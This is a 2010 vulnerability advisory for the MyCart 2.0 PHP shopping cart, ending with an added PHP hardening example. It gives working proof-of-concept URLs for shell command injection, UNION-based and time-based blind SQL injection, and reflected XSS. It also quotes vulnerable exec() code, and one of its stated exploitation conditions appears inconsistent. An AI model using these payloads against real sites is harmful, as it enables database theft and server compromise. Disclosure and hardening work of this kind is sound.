MyCart 2.0 Multiple Remote Vulnerabilities

Name               MyCart
Vendor             http://open.appideas.com
Versions Affected  2.0
Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-10-27

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

MyCart is a collection of PHP scripts that set up the backbone of a shopping cart or on-line ordering system.

II. DESCRIPTION
_______________

Many parameters are not properly sanitised before being used in SQL queries and in some PHP functions.

III. ANALYSIS
_____________

Summary:

A) Multiple Remote Command Execution
B) Multiple SQL Injection
C) Multiple Blind SQL Injection
D) XSS

A) Multiple Remote Command Execution
____________________________________

Reading the README file you may notice the following lines:

    If you can't make anything work, change the require(...) statement in
    the files of the admin directory to read:

    require("../Cart.php");

In the "admin" directory there is a file named uploadItem.php with the following content:

    <?
    require("Cart.php");
    Root();
    exec("mv $image '$WebRoot/images/".$ItemID.".jpg'");
    Header("Location: $Relative/admin/index.php");
    ?>

After changing require("Cart.php") to require("../Cart.php"), it is possible to execute remote commands by injecting them through the $image variable, which is interpolated unescaped into the exec() command line. The same security flaw is also present in removeItemResponse.php and in removeCategoryResponse.php via SQL Injection.

Successful exploitation requires that register_globals is set to Off. For removeCategoryResponse.php, successful exploitation requires that magic_quotes_gpc is set to Off.

B) Multiple SQL Injection
_________________________

Many parameters are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation requires that magic_quotes_gpc is set to Off.
C) Multiple Blind SQL Injection
_______________________________

Many parameters are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation requires that magic_quotes_gpc is set to Off.

D) XSS
______

Input passed to the "ON" parameter in receipt.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

IV. SAMPLE CODE
_______________

A) Multiple Remote Command Execution

http://site/path/admin/uploadItem.php?image=.;;
http://site/path/admin/removeItemResponse.php?ItemID=.; ping localhost ;
http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' UNION SELECT '; ping localhost ;'%23

B) Multiple SQL Injection

http://site/path/description.php?II=-1' UNION SELECT 1,2,3,4,5,6,7%23&UID=VALID UID HERE
http://site/path/receipt.php?BI=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23
http://site/path/admin/searchReceiptsResponse?criteria=order&OrderNumber=-1' UNION SELECT 1,2,3,4,5,6%23
http://site/path/admin/searchReceiptsResponse?criteria=name&User=%25' UNION SELECT 1,2,3,4,5,6%23
http://site/path/admin/searchReceiptsResponse?Year=%25' UNION SELECT 1,2,3,4,5,6%23
http://site/path/admin/searchReceiptsResponse?Month=%25' UNION SELECT 1,2,3,4,5,6%23
http://site/path/admin/searchReceiptsResponse?Day=%25' UNION SELECT 1,2,3,4,5,6%23

C) Multiple Blind SQL Injection

http://site/path/index.php?UID=' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23
http://site/path/removeItem.php?CartItemsID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23
http://site/path/removeItemResponse?ItemID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23
http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999.,NULL),NULL)))%23

D) XSS
http://site/path/receipt.php?ON=<script>alert('xss');</script>

V. FIX
______

No fix.
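The vendor provided no fix at the time of this advisory. As an added example (not vendor or author code), this is how the uploadItem.php handler quoted in section A could be hardened so that no attacker-influenced string reaches a shell; the request parameter names "image" and "ItemID", the Cart.php globals ($WebRoot, $Relative, Root()) and the upload_tmp staging directory are assumptions.

```php
<?php
// Added hardening example for the uploadItem.php handler quoted in section A.
// Not vendor code. Assumptions: Cart.php defines Root() (admin check) and the
// globals $WebRoot / $Relative; the image path and item id arrive as request
// parameters "image" and "ItemID"; uploads are staged in the hypothetical
// directory $WebRoot/upload_tmp.
require("../Cart.php");
Root();

// 1. Never rely on register_globals: read input explicitly.
$image  = isset($_REQUEST['image'])  ? $_REQUEST['image']  : '';
$itemId = isset($_REQUEST['ItemID']) ? $_REQUEST['ItemID'] : '';

// 2. Allow-list the item id: digits only, so it can never carry shell or
//    path metacharacters into the destination filename.
if (!ctype_digit($itemId)) {
    header("HTTP/1.1 400 Bad Request");
    exit("invalid ItemID");
}

// 3. Confine the source path to the staging directory. realpath() resolves
//    "../" and symlinks; the prefix check rejects anything outside it.
$stage = realpath("$WebRoot/upload_tmp");
$src   = realpath($image);
if ($stage === false || $src === false
        || strpos($src, $stage . DIRECTORY_SEPARATOR) !== 0
        || !is_file($src)) {
    header("HTTP/1.1 400 Bad Request");
    exit("invalid image path");
}

// 4. Move the file with a filesystem call instead of exec("mv ..."), so no
//    shell ever parses the request-controlled value.
$dst = "$WebRoot/images/" . $itemId . ".jpg";
if (!rename($src, $dst)) {
    header("HTTP/1.1 500 Internal Server Error");
    exit("could not store image");
}

// If a shell command were unavoidable, every interpolated value would have
// to be wrapped with escapeshellarg(), e.g.
//   exec("mv " . escapeshellarg($src) . " " . escapeshellarg($dst));
// but removing the shell from the path entirely is the stronger fix.

header("Location: $Relative/admin/index.php");
```

The same two controls, an integer allow-list on the id and parameterised queries instead of string-built SQL, are the corresponding mitigation for the removeItemResponse.php and removeCategoryResponse.php paths described in section A.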